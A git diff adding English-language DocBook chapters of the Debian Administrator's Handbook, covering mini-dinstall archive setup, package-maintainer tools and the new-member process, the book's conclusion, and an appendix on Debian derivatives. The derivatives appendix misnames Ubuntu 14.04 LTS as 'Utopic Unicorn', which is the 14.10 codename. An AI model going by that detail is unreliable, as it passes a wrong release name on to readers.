+
+verify_sigs = 0
+mail_to = admin@falcot.com
+
+generate_release = 1
+release_origin = Falcot Corp
+release_codename = stable
+
+[updates]
+release_label = Recompiled Debian Packages
+
+[internal]
+release_label = Internal Packages
+</programlisting>
+		 <para>
+			One decision worth noting is the generation of <filename>Release</filename> files for each archive. This can help manage package installation priorities using the <filename>/etc/apt/preferences</filename> configuration file (see <xref linkend="sect.apt.priorities" /> for details).
+		</para>
+		 <sidebar> <title><emphasis>SECURITY</emphasis> <command>mini-dinstall</command> and permissions</title>
+		 <para>
+			Since <command>mini-dinstall</command> has been designed to run as a regular user, there's no need to run it as root. The easiest way is to configure everything within the user account belonging to the administrator in charge of creating the Debian packages. Since only this administrator has the required permissions to put files in the <filename>incoming/</filename> directory, we can deduce that the administrator authenticated the origin of each package prior to deployment and <command>mini-dinstall</command> does not need to do it again. This explains the <literal>verify_sigs = 0</literal> parameter (which means that signatures need not be verified). However, if the contents of packages are sensitive, we can reverse the setting and elect to authenticate with a keyring containing the public keys of persons allowed to create packages (configured with the <literal>extra_keyrings</literal> parameter); <command>mini-dinstall</command> will then check the origin of each incoming package by analyzing the signature integrated to the <filename>*.changes</filename> file.
+		</para>
+		 </sidebar> <para>
+			Invoking <command>mini-dinstall</command> actually starts a daemon in the background. As long as this daemon runs, it will check for new packages in the <filename>incoming/</filename> directory every half-hour; when a new package arrives, it will be moved to the archive and the appropriate <filename>Packages.gz</filename> and <filename>Sources.gz</filename> files will be regenerated. If running a daemon is a problem, <command>mini-dinstall</command> can also be manually invoked in batch mode (with the <literal>-b</literal> option) every time a package is uploaded into the <filename>incoming/</filename> directory. Other possibilities provided by <command>mini-dinstall</command> are documented in its <citerefentry><refentrytitle>mini-dinstall</refentrytitle>
+			 <manvolnum>1</manvolnum></citerefentry> manual page.
+		</para>
+		 <sidebar> <title><emphasis>EXTRA</emphasis> Generating a signed archive</title>
+		 <para>
+			The APT suite checks a chain of cryptographic signatures on the packages it handles before installing them, in order to ensure their authenticity (see <xref linkend="sect.package-authentication" />). Private APT archives can then be a problem, since the machines using them will keep displaying warnings about unsigned packages. A diligent administrator will therefore integrate private archives with the secure APT mechanism.
+		</para>
+		 <para>
+			To help with this process, <command>mini-dinstall</command> includes a <literal>release_signscript</literal> configuration option that allows specifying a script to use for generating the signature. A good starting point is the <filename>sign-release.sh</filename> script provided by the <emphasis role="pkg">mini-dinstall</emphasis> package in <filename>/usr/share/doc/mini-dinstall/examples/</filename>; local changes may be relevant.
+		</para>
+		 </sidebar>
+	</section>
+	 <section id="sect.becoming-package-maintainer">
+		<title>Becoming a Package Maintainer</title>
+		 <section>
+			<title>Learning to Make Packages</title>
+			 <para>
+				Creating a quality Debian package is not always a simple task, and becoming a package maintainer takes some learning, both with theory and practice. It's not a simple matter of building and installing software; rather, the bulk of the complexity comes from understanding the problems and conflicts, and more generally the interactions, with the myriad of other packages available.
+			</para>
+			 <section>
+				<title>Rules</title>
+				 <para>
+					A Debian package must comply with the precise rules compiled in the Debian policy, and each package maintainer must know them. There is no requirement to know them by heart, but rather to know they exist and to refer to them whenever a choice presents a non-trivial alternative. Every Debian maintainer has made mistakes by not knowing about a rule, but this is not a huge problem as long as the error gets fixed when a user reports it as a bug report (which tends to happen fairly soon thanks to advanced users). <ulink type="block" url="https://www.debian.org/doc/debian-policy/" />
+				</para>
+
+			</section>
+			 <section>
+				<title>Procedures</title>
+				 <indexterm>
+					<primary>Debian Developer's Reference</primary>
+				</indexterm>
+				 <para>
+					Debian is not a simple collection of individual packages. Everyone's packaging work is part of a collective project; being a Debian developer involves knowing how the Debian project operates as a whole. Every developer will, sooner or later, interact with others. The Debian Developer's Reference (in the <emphasis role="pkg">developers-reference</emphasis> package) summarizes what every developer must know in order to interact as smoothly as possible with the various teams within the project, and to take the best possible advantages of the available resources. This document also enumerates a number of duties a developer is expected to fulfill. <ulink type="block" url="https://www.debian.org/doc/manuals/developers-reference/" />
+				</para>
+
+			</section>
+			 <section>
+				<title>Tools</title>
+				 <para>
+					Many tools help package maintainers in their work. This section describes them quickly, but does not give the full details, since they all have comprehensive documentation of their own.
+				</para>
+				 <section>
+					<title>The <command>lintian</command> Program</title>
+					 <indexterm>
+						<primary><command>lintian</command></primary>
+					</indexterm>
+					 <para>
+						This tool is one of the most important: it's the Debian package checker. It is based on a large array of tests created from the Debian policy, and detects quickly and automatically many errors that can then be fixed before packages are released.
+					</para>
+					 <para>
+						This tool is only a helper, and it sometimes gets it wrong (for instance, since the Debian policy changes over time, <command>lintian</command> is sometimes outdated). It is also not exhaustive: not getting any Lintian error should not be interpreted as a proof that the package is perfect; at most, it avoids the most common errors.
+					</para>
+
+				</section>
+				 <section>
+					<title>The <command>piuparts</command> Program</title>
+					 <indexterm>
+						<primary><command>piuparts</command></primary>
+					</indexterm>
+					 <para>
+						This is another important tool: it automates the installation, upgrade, removal and purge of a package (in an isolated environment), and checks that none of these operations leads to an error. It can help in detecting missing dependencies, and it also detects when files are incorrectly left over after the package got purged.
+					</para>
+
+				</section>
+				 <section>
+					<title>devscripts</title>
+					 <indexterm>
+						<primary><emphasis role="pkg">devscripts</emphasis></primary>
+					</indexterm>
+					 <indexterm>
+						<primary><command>debuild</command></primary>
+					</indexterm>
+					 <indexterm>
+						<primary><command>dch</command></primary>
+					</indexterm>
+					 <indexterm>
+						<primary><command>uscan</command></primary>
+					</indexterm>
+					 <indexterm>
+						<primary><command>debi</command></primary>
+					</indexterm>
+					 <indexterm>
+						<primary><command>debc</command></primary>
+					</indexterm>
+					 <para>
+						The <emphasis role="pkg">devscripts</emphasis> package contains many programs helping with a wide array of a Debian developer's job:
+					</para>
+					 <itemizedlist>
+						<listitem>
+							<para>
+								<command>debuild</command> allows generating a package (with <command>dpkg-buildpackage</command>) and running <command>lintian</command> to check its compliance with the Debian policy afterwards.
+							</para>
+
+						</listitem>
+						 <listitem>
+							<para>
+								<command>debclean</command> cleans a source package after a binary package has been generated.
+							</para>
+
+						</listitem>
+						 <listitem>
+							<para>
+								<command>dch</command> allows quick and easy editing of a <filename>debian/changelog</filename> file in a source package.
+							</para>
+
+						</listitem>
+						 <listitem>
+							<para>
+								<command>uscan</command> checks whether a new version of a software has been released by the upstream author; this requires a <filename>debian/watch</filename> file with a description of the location of such releases.
+							</para>
+
+						</listitem>
+						 <listitem>
+							<para>
+								<command>debi</command> allows installing (with <command>dpkg -i</command>) the Debian package that was just generated without the need to type its full name and path.
+							</para>
+
+						</listitem>
+						 <listitem>
+							<para>
+								In a similar fashion, <command>debc</command> allows scanning the contents of the recently-generated package (with <command>dpkg -c</command>), without needing to type its full name and path.
+							</para>
+
+						</listitem>
+						 <listitem>
+							<para>
+								<command>bts</command> controls the bug tracking system from the command line; this program automatically generates the appropriate emails.
+							</para>
+
+						</listitem>
+						 <listitem>
+							<para>
+								<command>debrelease</command> uploads a recently-generated package to a remote server, without needing to type the full name and path of the related <filename>.changes</filename> file.
+							</para>
+
+						</listitem>
+						 <listitem>
+							<para>
+								<command>debsign</command> signs the <filename>*.dsc</filename> and <filename>*.changes</filename> files.
+							</para>
+
+						</listitem>
+						 <listitem>
+							<para>
+								<command>uupdate</command> automates the creation of a new revision of a package when a new upstream version has been released.
+							</para>
+
+						</listitem>
+
+					</itemizedlist>
+
+				</section>
+				 <section>
+					<title><emphasis role="pkg">debhelper</emphasis> and <emphasis role="pkg">dh-make</emphasis></title>
+					 <indexterm>
+						<primary><emphasis>debhelper</emphasis></primary>
+					</indexterm>
+					 <indexterm>
+						<primary><emphasis>dh-make</emphasis></primary>
+					</indexterm>
+					 <para>
+						Debhelper is a set of scripts easing the creation of policy-compliant packages; these scripts are invoked from <filename>debian/rules</filename>. Debhelper has been widely adopted within Debian, as evidenced by the fact that it is used by the majority of official Debian packages. All the commands it contains have a <command>dh_</command> prefix.
+					</para>
+					 <para>
+						The <command>dh_make</command> script (in the <emphasis>dh-make</emphasis> package) creates files required for generating a Debian package in a directory initially containing the sources for a piece of software. As can be guessed from the name of the program, the generated files use debhelper by default.
+					</para>
+
+				</section>
+				 <section>
+					<title><command>dupload</command> and <command>dput</command></title>
+					 <indexterm>
+						<primary><command>dupload</command></primary>
+					</indexterm>
+					 <indexterm>
+						<primary><command>dput</command></primary>
+					</indexterm>
+					 <para>
+						The <command>dupload</command> and <command>dput</command> commands allow uploading a Debian package to a (possibly remote) server. This allows developers to publish their package on the main Debian server (<literal>ftp-master.debian.org</literal>) so that it can be integrated to the archive and distributed by mirrors. These commands take a <filename>*.changes</filename> file as a parameter, and deduce the other relevant files from its contents.
+					</para>
+
+				</section>
+
+			</section>
+
+		</section>
+		 <section>
+			<title>Acceptance Process</title>
+			 <para>
+				Becoming a “Debian developer” is not a simple administrative matter. The process comprises several steps, and is as much an initiation as it is a selection process. In any case, it is formalized and well-documented, so anyone can track their progression on the website dedicated to the new member process. <ulink type="block" url="https://nm.debian.org/" />
+			</para>
+			 <sidebar> <title><emphasis>EXTRA</emphasis> Lightweight process for “Debian Maintainers”</title>
+			 <para>
+				“Debian Maintainer” is another status that gives less privileges than “Debian developer” but whose associated process is quicker. With this status, the contributors can maintain their own packages only. A Debian developer only needs to perform a check on an initial upload, and issue a statement to the effect that they trust the prospective maintainer with the ability to maintain the package on their own.
+			</para>
+			 <indexterm>
+				<primary>Debian Maintainer</primary>
+			</indexterm>
+			 </sidebar> <section>
+				<title>Prerequisites</title>
+				 <para>
+					All candidates are expected to have at least a working knowledge of the English language. This is required at all levels: for the initial communications with the examiner, of course, but also later, since English is the preferred language for most of the documentation; also, package users will be communicating in English when reporting bugs, and they will expect replies in English.
+				</para>
+				 <para>
+					The other prerequisite deals with motivation. Becoming a Debian developer is a process that only makes sense if the candidate knows that their interest in Debian will last for many months. The acceptance process itself may last for several months, and Debian needs developers for the long haul; each package needs permanent maintenance, and not just an initial upload.
+				</para>
+
+			</section>
+			 <section>
+				<title>Registration</title>
+				 <para>
+					The first (real) step consists in finding a sponsor or advocate; this means an official developer willing to state that they believe that accepting <emphasis>X</emphasis> would be a good thing for Debian. This usually implies that the candidate has already been active within the community, and that their work has been appreciated. If the candidate is shy and their work is not publicly touted, they can try to convince a Debian developer to advocate them by showing their work in a private way.
+				</para>
+				 <indexterm>
+					<primary>key pair</primary>
+				</indexterm>
+				 <para>
+					At the same time, the candidate must generate a public/private RSA key pair with GnuPG, which should be signed by at least two official Debian developers. The signature authenticates the name on the key. Effectively, during a key signing party, each participant must show an official identification (usually an ID card or passport) together with their key identifiers. This step confirms the link between the human and the keys. This signature thus requires meeting in real life. If you have not yet met any Debian developers in a public free software conference, you can explicitly seek developers living nearby using the list on the following webpage as a starting point. <ulink type="block" url="https://wiki.debian.org/Keysigning" />
+				</para>
+				 <para>
+					Once the registration on <literal>nm.debian.org</literal> has been validated by the advocate, an <emphasis>Application Manager</emphasis> is assigned to the candidate. The application manager will then drive the process through multiple pre-defined steps and checks.
+				</para>
+				 <para>
+					The first verification is an identity check. If you already have a key signed by two Debian developers, this step is easy; otherwise, the application manager will try and guide you in your search for Debian developers close by to organize a meet-up and a key signing.
+				</para>
+
+			</section>
+			 <section>
+				<title>Accepting the Principles</title>
+				 <para>
+					These administrative formalities are followed by philosophical considerations. The point is to make sure that the candidate understands and accepts the social contract and the principles behind Free Software. Joining Debian is only possible if one shares the values that unite the current developers, as expressed in the founding texts (and summarized in <xref linkend="the-debian-project" />).
+				</para>
+				 <para>
+					In addition, each candidate wishing to join the Debian ranks is expected to know the workings of the project, and how to interact appropriately to solve the problems they will doubtless encounter as time passes. All of this information is generally documented in manuals targeting the new maintainers, and in the Debian developer's reference. An attentive reading of this document should be enough to answer the examiner's questions. If the answers are not satisfactory, the candidate will be informed. They will then have to read (again) the relevant documentation before trying again. In the cases where the existing documentation does not contain the appropriate answer for the question, the candidate can usually reach an answer with some practical experience within Debian, or potentially by discussing with other Debian developers. This mechanism ensures that candidates get involved somewhat in Debian before becoming a full part of it. It is a deliberate policy, by which candidates who eventually join the project are integrated as another piece of an infinitely extensible jigsaw puzzle.
+				</para>
+				 <indexterm>
+					<primary><emphasis>Philosophy &amp; Procedures</emphasis></primary>
+				</indexterm>
+				 <para>
+					This step is usually known as the <emphasis>Philosophy &amp; Procedures</emphasis> (P&amp;P for short) in the lingo of the developers involved in the new member process.
+				</para>
+
+			</section>
+			 <section>
+				<title>Checking Skills</title>
+				 <para>
+					Each application to become an official Debian developer must be justified. Becoming a project member requires showing that this status is legitimate, and that it facilitates the candidate's job in helping Debian. The most common justification is that being granted Debian developer status eases maintenance of a Debian package, but it is not the only one. Some developers join the project to contribute to porting to a specific architecture, others want to improve documentation, and so on.
+				</para>
+				 <para>
+					This step represents the opportunity for the candidate to state what they intend to do within the Debian project and to show what they have already done towards that end. Debian is a pragmatic project and saying something is not enough, if the actions do not match what is announced. Generally, when the intended role within the project is related to package maintenance, a first version of the prospective package will have to be validated technically and uploaded to the Debian servers by a sponsor among the existing Debian developers.
+				</para>
+				 <sidebar> <title><emphasis>COMMUNITY</emphasis> Sponsoring</title>
+				 <indexterm>
+					<primary>sponsoring</primary>
+				</indexterm>
+				 <para>
+					Debian developers can “sponsor” packages prepared by someone else, meaning that they publish them in the official Debian repositories after having performed a careful review. This mechanism enables external persons, who have not yet gone through the new member process, to contribute occasionally to the project. At the same time, it ensures that all packages included in Debian have always been checked by an official member.
+				</para>
+				 </sidebar> <para>
+					Finally, the examiner checks the candidate's technical (packaging) skills with a detailed questionnaire. Bad answers are not permitted, but the answer time is not limited. All the documentation is available and several tries are allowed if the first answers are not satisfactory. This step does not intend to discriminate, but to ensure at least a modicum of knowledge common to new contributors.
+				</para>
+				 <indexterm>
+					<primary><emphasis>Tasks &amp; Skills</emphasis></primary>
+				</indexterm>
+				 <para>
+					This step is known as the <emphasis>Tasks &amp; Skills</emphasis> step (T&amp;S for short) in the examiners' jargon.
+				</para>
+
+			</section>
+			 <section>
+				<title>Final Approval</title>
+				 <para>
+					At the very last step, the whole process is reviewed by a DAM (<emphasis>Debian Account Manager</emphasis>). The DAM will review all the information about the candidate that the examiner collected, and makes the decision on whether or not to create an account on the Debian servers. In cases where extra information is required, the account creation may be delayed. Refusals are rather rare if the examiner does a good job of following the process, but they sometimes happen. They are never permanent, and the candidate is free to try again at a later time.
+				</para>
+				 <para>
+					The DAM's decision is authoritative and (almost) without appeal, which explains why the people in that seat have often been criticized in the past.
+				</para>
+
+			</section>
+
+		</section>
+
+	</section>
+</chapter>
+
diff --git a/tmp/cs-CZ/xml/70_conclusion.xml b/tmp/cs-CZ/xml/70_conclusion.xml
new file mode 100644
index 000000000..be1c2890c
--- /dev/null
+++ b/tmp/cs-CZ/xml/70_conclusion.xml
@@ -0,0 +1,79 @@
+<?xml version='1.0' encoding='utf-8' ?>
+<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.5//EN" "http://www.oasis-open.org/docbook/xml/4.5/docbookx.dtd" [
+]>
+<chapter id="conclusion" lang="cs-CZ">
+	<chapterinfo>
+		 <keywordset>
+			<keyword>Future</keyword>
+			 <keyword>Improvements</keyword>
+			 <keyword>Opinions</keyword>
+
+		</keywordset>
+
+	</chapterinfo>
+	 <title>Conclusion: Debian's Future</title>
+	 <highlights> <para>
+		The story of Falcot Corp ends with this last chapter; but Debian lives on, and the future will certainly bring many interesting surprises.
+	</para>
+	 </highlights> <section id="sect.upcoming-developments">
+		<title>Upcoming Developments</title>
+		 <para>
+			Weeks (or months) before a new version of Debian is released, the Release Manager picks the codename for the next version. Now that Debian version 8 is out, the developers are already busy working on the next version, codenamed <emphasis role="distribution">Stretch</emphasis>…
+		</para>
+		 <para>
+			There is no official list of planned changes, and Debian never makes promises relating to technical goals of the coming versions. However, a few development trends can already be noted, and we can try some bets on what might happen (or not).
+		</para>
+		 <para>
+			In order to improve security and trust, most if not all the packages will be made to build reproducibly; that is to say, it will be possible to rebuild byte-for-byte identical binary packages from the source packages, thus allowing everyone to verify that no tampering has happened during the builds.
+		</para>
+		 <para>
+			In a related theme, a lot of effort will have gone into improving security by default, and mitigating both “traditional” attacks and the new threats implied by mass surveillance.
+		</para>
+		 <para>
+			Of course, all the main software suites will have had a major release. The latest version of the various desktops will bring better usability and new features. Wayland, the new display server that is being developed to replace X11 with a more modern alternative, will be available (although maybe not default) for at least some desktop environments.
+		</para>
+		 <para>
+			A new feature of the archive maintenance software, “bikesheds”, will allow developers to host special-purpose package repositories in addition to the main repositories; this will allow for personal package repositories, repositories for software not ready to go into the main archive, repositories for software that has only a very small audience, temporary repositories for testing new ideas, and so on.
+		</para>
+
+	</section>
+	 <section id="sect.future-of-debian">
+		<title>Debian's Future</title>
+		 <para>
+			In addition to these internal developments, one can reasonably expect new Debian-based distributions to come to light, as many tools keep making this task easier. New specialized subprojects will also be started, in order to widen Debian's reach to new horizons.
+		</para>
+		 <para>
+			The Debian user community will increase, and new contributors will join the project… including, maybe, you!
+		</para>
+		 <para>
+			The Debian project is stronger than ever, and well on its way towards its goal of a universal distribution; the inside joke within the Debian community is about <foreignphrase>World Domination</foreignphrase>.
+		</para>
+		 <para>
+			In spite of its old age and its respectable size, Debian keeps on growing in all kinds of (sometimes unexpected) directions. Contributors are teeming with ideas, and discussions on development mailing lists, even when they look like bickerings, keep increasing the momentum. Debian is sometimes compared to a black hole, of such density that any new free software project is attracted.
+		</para>
+		 <para>
+			Beyond the apparent satisfaction of most Debian users, a deep trend is becoming more and more indisputable: people are increasingly realising that collaborating, rather than working alone in their corner, leads to better results for everyone. Such is the rationale used by distributions merging into Debian by way of subprojects.
+		</para>
+		 <para>
+			The Debian project is therefore not threatened by extinction…
+		</para>
+
+	</section>
+	 <section id="sect.future-of-this-book">
+		<title>Future of this Book</title>
+		 <para>
+			We would like this book to evolve in the spirit of free software. We therefore welcome contributions, remarks, suggestions, and criticism. Please direct them to Raphaël (<email>hertzog@debian.org</email>) or Roland (<email>lolando@debian.org</email>). For actionable feedback, feel free to open bug reports against the <literal>debian-handbook</literal> Debian package. The website will be used to gather all information relevant to its evolution, and you will find there information on how to contribute, in particular if you want to translate this book to make it available to an even larger public than today. <ulink type="block" url="http://debian-handbook.info/" />
+		</para>
+		 <para>
+			We tried to integrate most of what our experience at Debian taught us, so that anyone can use this distribution and take the best advantage of it as soon as possible. We hope this book contributes to making Debian less confusing and more popular, and we welcome publicity around it!
+		</para>
+		 <para>
+			We would like to conclude on a personal note. Writing (and translating) this book took a considerable amount of time out of our usual professional activity. Since we are both freelance consultants, any new source of income grants us the freedom to spend more time improving Debian; we hope this book to be successful and to contribute to this. In the meantime, feel free to retain our services! <ulink type="block" url="http://www.freexian.com" /> <ulink type="block" url="http://www.gnurandal.com" />
+		</para>
+		 <para>
+			See you soon!
+		</para>
+
+	</section>
+</chapter>
+
diff --git a/tmp/cs-CZ/xml/90_derivative-distributions.xml b/tmp/cs-CZ/xml/90_derivative-distributions.xml
new file mode 100644
index 000000000..a226058b6
--- /dev/null
+++ b/tmp/cs-CZ/xml/90_derivative-distributions.xml
@@ -0,0 +1,226 @@
+<?xml version='1.0' encoding='utf-8' ?>
+<!DOCTYPE appendix PUBLIC "-//OASIS//DTD DocBook XML V4.5//EN" "http://www.oasis-open.org/docbook/xml/4.5/docbookx.dtd" [
+]>
+<appendix id="derivative-distributions" lang="cs-CZ">
+	<appendixinfo>
+		 <keywordset>
+			<keyword>Live CD</keyword>
+			 <keyword>Specificities</keyword>
+			 <keyword>Particular Choices</keyword>
+
+		</keywordset>
+
+	</appendixinfo>
+	 <title>Derivative Distributions</title>
+	 <highlights> <para>
+		<indexterm><primary>derivative distribution</primary></indexterm> <indexterm><primary>distribution, derivative</primary></indexterm> Many Linux distributions are derivatives of Debian and reuse Debian's package management tools. They all have their own interesting properties, and it is possible one of them will fulfill your needs better than Debian itself.
+	</para>
+	 </highlights> <section id="sect.derivative-census">
+		<title>Census and Cooperation</title>
+		 <para>
+			The Debian project fully acknowledges the importance of derivative distributions and actively supports collaboration between all involved parties. This usually involves merging back the improvements initially developed by derivative distributions so that everyone can benefit and long-term maintenance work is reduced.
+		</para>
+		 <para>
+			This explains why derivative distributions are invited to become involved in discussions on the <literal>debian-derivatives@lists.debian.org</literal> mailing-list, and to participate in the derivative census. This census aims at collecting information on work happening in a derivative so that official Debian maintainers can better track the state of their package in Debian variants. <ulink type="block" url="https://wiki.debian.org/DerivativesFrontDesk" /><ulink type="block" url="https://wiki.debian.org/Derivatives/Census" />
+		</para>
+		 <para>
+			Let us now briefly describe the most interesting and popular derivative distributions.
+		</para>
+
+	</section>
+	 <section id="sect.ubuntu">
+		<title>Ubuntu</title>
+		 <indexterm>
+			<primary>Ubuntu</primary>
+		</indexterm>
+		 <para>
+			Ubuntu made quite a splash when it came on the Free Software scene, and for good reason: Canonical Ltd., the company that created this distribution, started by hiring thirty-odd Debian developers and publicly stating the far-reaching objective of providing a distribution for the general public with a new release twice a year. They also committed to maintaining each version for a year and a half.
+		</para>
+		 <para>
+			These objectives necessarily involve a reduction in scope; Ubuntu focuses on a smaller number of packages than Debian, and relies primarily on the GNOME desktop (although an official Ubuntu derivative, called “Kubuntu”, relies on KDE Plasma). Everything is internationalized and made available in a great many languages.
+		</para>
+		 <indexterm>
+			<primary>Kubuntu</primary>
+		</indexterm>
+		 <para>
+			So far, Ubuntu has managed to keep this release rhythm. They also publish <emphasis>Long Term Support</emphasis> (LTS) releases, with a 5-year maintenance promise. As of April 2015, the current LTS version is version 14.04, nicknamed Utopic Unicorn. The last non-LTS version is version 15.04, nicknamed Vivid Vervet. Version numbers describe the release date: 15.04, for example, was released in April 2015.
+		</para>
+		 <sidebar> <title><emphasis>IN PRACTICE</emphasis> Ubuntu's support and maintenance promise</title>
+		 <indexterm>
+			<primary><literal>main</literal></primary>
+		</indexterm>
+		 <indexterm>
+			<primary><literal>restricted</literal></primary>
+		</indexterm>
+		 <indexterm>
+			<primary><literal>universe</literal></primary>
+		</indexterm>
+		 <indexterm>
+			<primary><literal>multiverse</literal></primary>
+		</indexterm>
+		 <para>
+			Canonical has adjusted multiple times the rules governing the length of the period during which a given release is maintained. Canonical, as a company, promises to provide security updates to all the software available in the <literal>main</literal> and <literal>restricted</literal> sections of the Ubuntu archive, for 5 years for LTS releases and for 9 months for non-LTS releases. Everything else (available in the <literal>universe</literal> and <literal>multiverse</literal>) is maintained on a best-effort basis by volunteers of the MOTU team (<emphasis>Masters Of The Universe</emphasis>). Be prepared to handle security support yourself if you rely on packages of the latter sections.
+		</para>
+		 </sidebar> <para>
+			Ubuntu has reached a wide audience in the general public. Millions of users were impressed by its ease of installation, and the work that went into making the desktop simpler to use.
+		</para>
+		 <para>
+			Ubuntu and Debian used to have a tense relationship; Debian developers who had placed great hopes in Ubuntu contributing directly to Debian were disappointed by the difference between the Canonical marketing, which implied Ubuntu were good citizens in the Free Software world, and the actual practice where they simply made public the changes they applied to Debian packages. Things have been getting better over the years, and Ubuntu has now made it general practice to forward patches to the most appropriate place (although this only applies to external software they package and not to the Ubuntu-specific software such as Mir or Unity). <ulink type="block" url="http://www.ubuntu.com/" />
+		</para>
+
+	</section>
+	 <section id="sect.linux-mint">
+		<title>Linux Mint</title>
+		 <indexterm>
+			<primary>Linux Mint</primary>
+		</indexterm>
+		 <para>
+			Linux Mint is a (partly) community-maintained distribution, supported by donations and advertisements. Their flagship product is based on Ubuntu, but they also provide a “Linux Mint Debian Edition” variant that evolves continuously (as it is based on Debian Testing). In both cases, the initial installation involves booting a LiveDVD.
+		</para>
+		 <para>
+			The distribution aims at simplifying access to advanced technologies, and provides specific graphical user interfaces on top of the usual software. For instance, Linux Mint relies on Cinnamon instead of GNOME by default (but it also includes MATE as well as Plasma and Xfce); similarly, the package management interface, although based on APT, provides a specific interface with an evaluation of the risk from each package update.
+		</para>
+		 <para>
+			Linux Mint includes a large amount of proprietary software to improve the experience of users who might need those. For example: Adobe Flash and multimedia codecs. <ulink type="block" url="http://www.linuxmint.com/" />
+		</para>
+
+	</section>
+	 <section id="sect.knoppix">
+		<title>Knoppix</title>
+		 <indexterm>
+			<primary><foreignphrase>LiveCD</foreignphrase></primary>
+		</indexterm>
+		 <indexterm>
+			<primary>Knoppix</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>bootable CD-ROM</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>CD-ROM</primary>
+			<secondary>bootable</secondary>
+		</indexterm>
+		 <para>
+			The Knoppix distribution barely needs an introduction. It was the first popular distribution to provide a <emphasis>LiveCD</emphasis>; in other words, a bootable CD-ROM that runs a turn-key Linux system with no requirement for a hard-disk — any system already installed on the machine will be left untouched. Automatic detection of available devices allows this distribution to work in most hardware configurations. The CD-ROM includes almost 2 GB of (compressed) software, and the DVD-ROM version has even more.
+		</para>
+		 <para>
+			Combining this CD-ROM to a USB stick allows carrying your files with you, and to work on any computer without leaving a trace — remember that the distribution doesn't use the hard-disk at all. Knoppix uses LXDE (a lightweight graphical desktop) by default, but the DVD version also includes GNOME and Plasma. Many other distributions provide other combinations of desktops and software. This is, in part, made possible thanks to the <emphasis role="pkg">live-build</emphasis> Debian package that makes it relatively easy to create a LiveCD. <ulink type="block" url="http://live.debian.net/" />
+		</para>
+		 <indexterm>
+			<primary><emphasis role="pkg">live-build</emphasis></primary>
+		</indexterm>
+		 <para>
+			Note that Knoppix also provides an installer: you can first try the distribution as a LiveCD, then install it on a hard-disk to get better performance. <ulink type="block" url="http://www.knopper.net/knoppix/index-en.html" />
+		</para>
+
+	</section>
+	 <section id="sect.aptosid">
+		<title>Aptosid and Siduction</title>
+		 <indexterm>
+			<primary>Sidux</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>Aptosid</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>Siduction</primary>
+		</indexterm>
+		 <para>
+			These community-based distributions track the changes in Debian <emphasis role="distribution">Sid</emphasis> (<emphasis role="distribution">Unstable</emphasis>) — hence their name. The modifications are limited in scope: the goal is to provide the most recent software and to update drivers for the most recent hardware, while still allowing users to switch back to the official Debian distribution at any time. Aptosid was previously known as Sidux, and Siduction is a more recent fork of Aptosid. <ulink type="block" url="http://aptosid.com" /> <ulink type="block" url="http://siduction.org" />
+		</para>
+
+	</section>
+	 <section id="sect.grml">
+		<title>Grml</title>
+		 <indexterm>
+			<primary>Grml</primary>
+		</indexterm>
+		 <para>
+			Grml is a LiveCD with many tools for system administrators, dealing with installation, deployment, and system rescue. The LiveCD is provided in two flavors, <literal>full</literal> and <literal>small</literal>, both available for 32-bit and 64-bit PCs. Obviously, the two flavors differ by the amount of software included and by the resulting size. <ulink type="block" url="https://grml.org" />
+		</para>
+
+	</section>
+	 <section id="sect.tails">
+		<title>Tails</title>
+		 <indexterm>
+			<primary>Tails</primary>
+		</indexterm>
+		 <para>
+			Tails (The Amnesic Incognito Live System) aims at providing a live system that preserves anonymity and privacy. It takes great care in not leaving any trace on the computer it runs on, and uses the Tor network to connect to the Internet in the most anonymous way possible. <ulink type="block" url="https://tails.boum.org" />
+		</para>
+
+	</section>
+	 <section id="sect.kali">
+		<title>Kali Linux</title>
+		 <indexterm>
+			<primary>Kali</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>penetration testing</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>forensics</primary>
+		</indexterm>
+		 <para>
+			Kali Linux is a Debian-based distribution specialising in penetration testing (“pentesting” for short). It provides software that helps auditing the security of an existing network or computer while it is live, and analyze it after an attack (which is known as “computer forensics”). <ulink type="block" url="https://kali.org" />
+		</para>
+
+	</section>
+	 <section id="sect.devuan">
+		<title>Devuan</title>
+		 <indexterm>
+			<primary>Devuan</primary>
+		</indexterm>
+		 <para>
+			Devuan is a relatively new fork of Debian: it started in 2014 as a reaction to the decision made by Debian to switch to <command>systemd</command> as the default init system. A group of users attached to <command>sysv</command> and opposing (real or perceived) drawbacks to <command>systemd</command> started Devuan with the objective of maintaining a <command>systemd</command>-less system. As of March 2015, they haven't published any real release: it remains to be seen if the project will succeed and find its niche, or if the systemd opponents will learn to accept it. <ulink type="block" url="https://devuan.org" />
+		</para>
+
+	</section>
+	 <section id="sect.tanglu">
+		<title>Tanglu</title>
+		 <indexterm>
+			<primary>Tanglu</primary>
+		</indexterm>
+		 <para>
+			Tanglu is another Debian derivative; this one is based on a mix of Debian <emphasis role="distribution">Testing</emphasis> and <emphasis role="distribution">Unstable</emphasis>, with patches to some packages. Its goal is to provide a modern desktop-friendly distribution based on fresh software, without the release constraints of Debian. <ulink type="block" url="http://tanglu.org" />
+		</para>
+
+	</section>
+	 <section id="sect.doudoulinux">
+		<title>DoudouLinux</title>
+		 <indexterm>
+			<primary>DoudouLinux</primary>
+		</indexterm>
+		 <para>
+			DoudouLinux targets young children (starting from 2 years old). To achieve this goal, it provides an heavily customized graphical interface (based on LXDE) and comes with many games and educative applications. Internet access is filtered to prevent children from visiting problematic websites. Advertisements are blocked. The goal is that parents should be free to let their children use their computer once booted into DoudouLinux. And children should love using DoudouLinux, just like they enjoy their gaming console. <ulink type="block" url="http://www.doudoulinux.org" />
+		</para>
+
+	</section>
+	 <section id="sect.raspbian">
+		<title>Raspbian</title>
+		 <indexterm>
+			<primary>Raspbian</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>Raspberry Pi</primary>
+		</indexterm>
+		 <para>
+			Raspbian is a rebuild of Debian optimised for the popular (and inexpensive) Raspberry Pi family of single-board computers. The hardware for that platform is more powerful than what the Debian <emphasis role="architecture">armel</emphasis> architecture can take advantage of, but lacks some features that would be required for <emphasis role="architecture">armhf</emphasis>; so Raspbian is a kind of intermediary, rebuilt specifically for that hardware and including patches targeting this computer only. <ulink type="block" url="https://raspbian.org" />
+		</para>
+
+	</section>
+	 <section id="sect.other-derivatives">
+		<title>And Many More</title>
